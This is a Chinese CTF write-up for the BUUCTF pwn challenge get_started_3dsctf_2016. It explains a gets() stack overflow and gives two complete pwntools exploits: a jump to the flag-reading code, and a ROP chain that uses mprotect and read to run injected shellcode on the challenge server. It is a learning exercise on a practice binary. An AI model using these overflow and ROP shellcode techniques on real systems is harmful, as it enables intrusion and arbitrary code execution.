[BUUCTF]PWN11——get_started_3dsctf_2016

题目网址:https://buuoj.cn/challenges#get_started_3dsctf_2016

步骤:

第一个方法,本地打通,要自己创建一个flag.txt

例行检查,32位,开启了nx保护

nc一下,看看程序大概的执行情况

32位ida载入,shift+f12查看程序里的字符串,看到了flag.txt

双击跟进,ctrl+x查看哪个函数调用了它,发现了一个函数,当a1=0x308cd64f,a2=0x195719d1的时候就会读出flag

看一下a1和a2在栈上的参数位置,它的位置在返回地址之后,没法利用溢出覆盖来控制程序

这边我们要想办法绕过这个if判断,tap+空格来到这个界面,看到从0x80489bb开始,程序开始设置打开flag.txt的参数,我们只要将程序执行流跳转到这里就可以读出flag

根据nc时候看到的字符串,找到输入点,gets函数,存在溢出漏洞,用来溢出覆盖返回地址

exp:

from pwn import*

p=process('./get_started_3dsctf_2016')
payload='a'*0x38+p32(0x80489bb)
p.sendline(payload)
p.interactive()

第二个方法可以打通远程,这也应该是这道题的准确做法

一开始是想用printf泄露libc的,但是调试exp的时候老是报错,一开始是以为python里的输出是print,改了之后还是不行,就放弃了

在查看了其他师傅的wp之后发现这题的关键所在是程序里有一个mprotect函数,它的作用是能够修改内存的权限为可读可写可执行,然后我们就可以往栈上写入shellcode,执行即可获取shell

首先按先说一下mprotect函数:原型如下

int mprotect(void *addr, size_t len, int prot);
addr 内存启始地址
len 修改内存的长度
prot 内存的权限

首先造成溢出,让程序跳转到mprotect函数地址,去执行

payload = 'A' * 0x38 + p32(mprotect_addr)

现在需要设置mprotect函数的三个参数,本来32位程序传参是不需要借用寄存器的,但是为了能够继续控制程序,需要用到ret指令,所以这里就借用指令片段了

ctrl+s调出程序的段表,将0x80EB000地址开始修改为可读可写可执行

使用以下指令可以找到我们需要的ret指令,我们mprotect函数只要设置3个参数,这边就借用3个寄存器

 ROPgadget --binary get_started_3dsctf_2016 --only 'pop|ret' | grep pop


然后来设置mprotect的参数,将返回地址填上read函数,我们接下来要将shellcode读入程序段,需要继续控制程序

payload += p32(pop3_ret) 

payload += p32(mem_addr)
payload += p32(mem_size)
payload += p32(mem_proc) payload += p32(read_addr)

read函数原型

ssize_t read(int fd, void *buf, size_t count);
fd 设为0时就可以从输入端读取内容 设为0
buf 设为我们想要执行的内存地址 设为我们已找到的内存地址0x80EB000
size 适当大小就可以 只要够读入shellcode就可以,设置大点无所谓

可以看到read函数也有三个参数要设置,我们就可以继续借用上面找到的有3个寄存器的ret指令

payload += p32(pop3_ret)  

payload += p32(0)
payload += p32(mem_addr)
payload += p32(0x100) payload += p32(mem_addr)#将read函数的返回地址设置到我们修改的内存的地址,之后我们要往里面写入shellcode

到这里我们已经完成了修改内存为可读可写可执行,将程序重定向到了我们修改好后的内存地址,接下来我们只要传入shellcode即可

r.sendline(asm(shellcraft.sh()))#shellcode可以利用pwntools直接生成
#shellcode=asm(shellcraft.sh())

完整EXP

from pwn import *

elf = ELF('./get_started_3dsctf_2016')

r=remote('node3.buuoj.cn', 29905)

pop3_ret = 0x804951D

mem_addr = 0x80EB000
mem_size = 0x1000
mem_proc = 0x7 mprotect_addr = elf.symbols['mprotect']
read_addr = elf.symbols['read'] payload = 'A' * 0x38
payload += p32(mprotect_addr)
payload += p32(pop3_ret) payload += p32(mem_addr)
payload += p32(mem_size)
payload += p32(mem_proc) payload += p32(read_addr) payload += p32(pop3_ret) payload += p32(0)
payload += p32(mem_addr)
payload += p32(0x100) payload += p32(mem_addr) r.sendline(payload) payload = asm(shellcraft.sh()) r.sendline(payload) r.interactive()


这题的主要方法就是利用ret持续控制程序

[BUUCTF]PWN11——get_started_3dsctf_2016的更多相关文章

  1. Buuctf刷题:部分

    get_started_3dsctf_2016 关键词:ROP链.栈溢出.mprotect()函数 可参考文章(优质): https://www.cnblogs.com/lyxf/p/12113401 ...

  2. [BUUCTF]PWN14——not_the_same_3dsctf_2016

    [BUUCTF]PWN14--not_the_same_3dsctf_2016 题目网址:https://buuoj.cn/challenges#not_the_same_3dsctf_2016 步骤 ...

  3. 刷题记录:[BUUCTF 2018]Online Tool

    目录 刷题记录:[BUUCTF 2018]Online Tool 一.知识点 1.escapeshellarg和escapeshellcmd使用不当导致rce 刷题记录:[BUUCTF 2018]On ...

  4. BUUCTF 部分wp

    目录 Buuctf crypto 0x01传感器 提示是曼联,猜测为曼彻斯特密码 wp:https://www.xmsec.cc/manchester-encode/ cipher: 55555555 ...

  5. buuctf misc 刷题记录

    1.金三胖 将gif分离出来. 2.N种方法解决 一个exe文件,果然打不开,在kali里分析一下:file KEY.exe,ascii text,先txt再说,base64 图片. 3.大白 crc ...

  6. BUUCTF知识记录

    [强网杯 2019]随便注 先尝试普通的注入 发现注入成功了,接下来走流程的时候碰到了问题 发现过滤了select和where这个两个最重要的查询语句,不过其他的过滤很奇怪,为什么要过滤update, ...

  7. buuctf misc wp 01

    buuctf misc wp 01 1.金三胖 2.二维码 3.N种方法解决 4.大白 5.基础破解 6.你竟然赶我走 1.金三胖 root@kali:~/下载/CTF题目# unzip 77edf3 ...

  8. buuctf misc wp 02

    buuctf misc wp 02 7.LSB 8.乌镇峰会种图 9.rar 10.qr 11.ningen 12.文件中的秘密 13.wireshark 14.镜子里面的世界 15.小明的保险箱 1 ...

  9. BUUCTF WEB-WP(3)

    BUUCTF WEB 几道web做题的记录 [ACTF2020 新生赛]Exec 知识点:exec命令执行 这题最早是在一个叫中学生CTF平台上看到的类似,比这题稍微要复杂一些,多了一些限制(看看大佬 ...

随机推荐

  1. 论文解读(LLE)《Nonlinear Dimensionality Reduction by Locally Linear Embedding》and LLE

    论文题目:<Nonlinear Dimensionality Reduction by Locally Linear Embedding > 发表时间:Science  2000 论文地址 ...

  2. Qt5加载SVG格式的图片并更颜色

    QIcon MainWindow::qiconFromSvg(QString svg_path, QString color) { QPixmap img(svg_path); QPainter qp ...

  3. Codeforces 506E - Mr. Kitayuta's Gift(神仙矩阵乘法)

    Codeforces 题目传送门 & 洛谷题目传送门 神仙题 %%%%%%%%%%%%% u1s1 感觉这道题风格很省选( 下记 \(m=|s|\),首先探讨 \(n+m\) 为偶数的情形. ...

  4. Codeforces 505E - Mr. Kitayuta vs. Bamboos(二分+堆)

    题面传送门 首先很显然的一点是,看到类似于"最大值最小"的字眼就考虑二分答案 \(x\)(这点我倒是想到了) 然鹅之后就不会做了/wq/wq/wq 注意到此题正着处理不太方便,故考 ...

  5. Codeforces 643G - Choosing Ads(线段树)

    Codeforces 题目传送门 & 洛谷题目传送门 首先考虑 \(p>50\) 的时候怎么处理,也就是求一个区间的绝对众数.我们知道众数这个东西是不能用线段树直接维护的,因为对于区间 ...

  6. 如何根据taxid(或taxname)快速获得taxname(或taxid)?

    目录 需求 实现 需求 我有一个物种taxonomy ID的list,想获得相应的物种名,不要一个个去NCBI Taxonomy官网查.反之根据物种名list查询对应的taxid. 实现 因为之前没怎 ...

  7. R语言与医学统计图形【7】低级绘图函数

    R语言基础绘图系统 基础绘图包之低级绘图函数--气泡图.一页多图.背景网格.添加线条和散点.数学表达式 4.气泡图 symbols是高级绘图函数,可在图上添加标记,标记的形状包括:circles,sq ...

  8. 15.Pow(x, n)

    Pow(x, n) Total Accepted: 88351 Total Submissions: 317095 Difficulty: Medium Implement pow(x, n). 思路 ...

  9. 3 - 简单了解一下springboot中的yml语法 和 使用yml赋值

    1.简单了解yml语法 2.使用yml给实体类赋值 准备工作:导入依赖 <!-- 这个jar包就是为了实体类中使用@ConfigurationProperties(prefix = " ...

  10. 一劳永逸,使用 PicGo + GitHub 搭建个人图床工具

    原文链接: 一劳永逸,使用 PicGo + GitHub 搭建个人图床工具 经常写博客的同学都知道,有一个稳定又好用的图床是多么重要.我之前用过七牛云 + Mpic 和微博图床,但总感觉配置起来比较麻 ...